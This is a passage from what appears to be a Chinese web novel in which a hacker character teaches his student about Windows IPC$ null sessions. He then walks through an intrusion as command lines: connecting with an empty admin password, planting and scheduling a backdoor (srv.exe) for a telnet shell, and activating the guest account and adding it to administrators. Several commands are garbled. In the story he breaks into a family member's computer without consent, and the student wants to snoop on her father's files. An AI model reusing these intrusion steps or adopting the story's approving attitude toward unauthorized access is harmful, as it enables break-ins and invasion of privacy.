林苗苗问道：“什么是IPC$？”

“IPC$全称为InternetProcessConnection是共享命名管道的资源。”慕秋继续说道。

“它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。”

林苗苗则拿出来了一个小本本开始记笔记了。

“利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码，而利用这个空的连接，连接者还可以得到目标主机上的用户列表。”

“如何打开目标的IPC$，首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。”

“当然，这shell必须是admin权限的,然后你可以使用shell执行命令netshareipc$，来开放目标的ipc$。”

“从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行。”

C:netuse127.0.0.1IPC$/user:admintitrators

显示用户名是administrators，密码为空的IP地址

慕秋先复制srv.exe上去，C:nettime127.0.0.1

查看完时间后，命令成功完成。

C:at127.0.0.111:05srv.exe

用at命令启动srv.exe

C:nettime127.0.0.1

然后用到Telnet命令，端口是99。Telnet默认的是23端口，使用的是SRV在对方计算机中为建立一个99端口的Shell。

用Copy命令把ntlm.exe上传到主机上。

C:WINNTsystem32ntlm

==输入ntlm启动，当出现DONE的时候，就说明已经启动正常。然后使用netstarttelnet来开启elnet服务！

Telnet127.0.0.1，接着输入用户名与密码就进入对方里。

再把guest激活加到管理组

C:netuserguest/active:yes

将对方的Guest用户激活

C:netuserguest1234

将Guest的密码改为1234

C:netlocalgroupadministratorsguest/add

将Guest变为Administrator.

慕秋在边讲解的时候，就已经入侵了林苗苗家内的一台电脑。

不过这台电脑并不是林苗苗的。

应该是她家人的。

“竟然真的成功了？！”林苗苗惊喜道，“看样子应该是我爸爸的电脑啊，我还从来没有看过他电脑呢，他在电脑里设置了密码，每次都不让我看，师父，快让我看看里面有什么！”